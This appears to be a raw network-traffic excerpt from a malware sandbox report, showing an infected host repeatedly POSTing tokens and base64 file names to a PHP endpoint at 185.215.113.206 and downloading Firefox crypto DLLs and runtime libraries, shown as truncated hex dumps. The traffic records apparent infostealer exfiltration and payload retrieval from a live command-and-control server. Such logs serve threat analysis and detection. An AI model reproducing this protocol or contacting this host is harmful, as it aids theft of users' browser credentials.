                                                                                                                                                                                                                                                Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:05.200671911 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:04 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:05.431164026 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: ------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="file"------BFBFBFIIJDAKECAKKJEH--
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:06.674190998 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:05 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:10.471910954 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="file"------CFHDHIJDGCBAKFIEGHCB--
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:11.525017977 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:10 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:12.668893099 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.117080927 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:12 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 685392
                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.117139101 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                Data Ascii: UhOt8]h1]UWVEtu}U
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.117988110 CET1236INData Raw: 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 51 50 e8 3f 96 06 00 83 c4 1c 5e 5f
                                                                                                                                                                                                                                                Data Ascii: Mt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8^
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.118014097 CET1236INData Raw: 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 40 8d 04 3f 83 c0 fe 8d 04 40 89 c1
                                                                                                                                                                                                                                                Data Ascii: T$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$|$ L$$
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.118027925 CET248INData Raw: 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d e5 c1 e0 10 c1 e1 08 09 c1 0f b6 45
                                                                                                                                                                                                                                                Data Ascii: uSPVEPo9]SUYY)ZYEME]M)19DEEE|0)U|2!!)]|3)|3!)}|7
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.119499922 CET1236INData Raw: 21 d7 b8 05 00 00 00 29 c8 c1 f8 1f f7 d0 8b 55 1c 80 7c 32 f2 01 19 db 09 c3 b8 06 00 00 00 29 c8 c1 f8 1f 80 7c 32 f1 01 f7 d0 19 d2 09 c2 21 da 21 fa b8 07 00 00 00 29 c8 c1 f8 1f f7 d0 8b 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10
                                                                                                                                                                                                                                                Data Ascii: !)U|2)|2!!)M|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjS
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.119678974 CET1236INData Raw: 08 8b 55 18 8b 4d 14 8b 5d 0c 8b 75 08 8b 3e 8b 46 04 39 d8 74 3a 8d 4e 08 8b 56 08 c7 46 08 00 00 00 00 85 ff 89 4d ec 89 55 f0 74 48 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff d1 83 c4 08 68 0c 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff
                                                                                                                                                                                                                                                Data Ascii: UM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.126374006 CET248INData Raw: 00 00 8d bd f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 89 b5 ec fe ff ff 56 e8 cf f7 07 00 83 c4 0c bb 00 01 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 8b 75 0c 56 ff 75 08 57 e8 ac f7 07 00 83 c4 0c 01 f7 29 f3 39 f3 77 e8 53 ff 75 08 57 e8
                                                                                                                                                                                                                                                Data Ascii: hh !Vf.@uVuW)9wSuWT>\>=t%>>fM1^_[]U}th
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.127178907 CET1236INData Raw: 07 00 83 c4 08 5d c3 cc cc cc cc cc 55 89 e5 56 8b 75 1c 8b 45 14 39 f0 73 14 68 03 e0 ff ff e8 3b f6 07 00 83 c4 04 b8 ff ff ff ff eb 16 8b 55 0c 8b 4d 08 56 ff 75 18 50 ff 75 10 e8 0b 00 00 00 83 c4 10 5e 5d c3 cc cc cc cc cc 55 89 e5 53 57 56
                                                                                                                                                                                                                                                Data Ascii: ]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.127351046 CET1236INData Raw: f2 17 66 0f 6f 2d e0 20 08 10 66 0f fe d5 f3 0f 5b d2 66 0f 70 e1 f5 66 0f f4 ca 66 0f 70 d2 f5 66 0f f4 d4 66 0f 6f e0 66 0f fe 25 00 21 08 10 66 0f 70 c9 e8 66 0f 70 d2 e8 66 0f 62 ca 66 0f 6e 54 07 04 66 0f 60 d3 66 0f 61 d3 66 0f eb cf 66 0f
                                                                                                                                                                                                                                                Data Ascii: fo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxEUMfEMUTFtFM
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:16.496714115 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:17.109087944 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:16 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 608080
                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:19.214327097 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:19.663041115 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:19 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 450024
                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:21.097229958 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:21.542823076 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:21 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 2046288
                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:26.983442068 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:27.429542065 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:27 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 257872
                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:28.766485929 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:29.215565920 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:28 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 80880
                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:30.553999901 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 1067
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:31.589854956 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:30 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:33.293889999 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 267
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
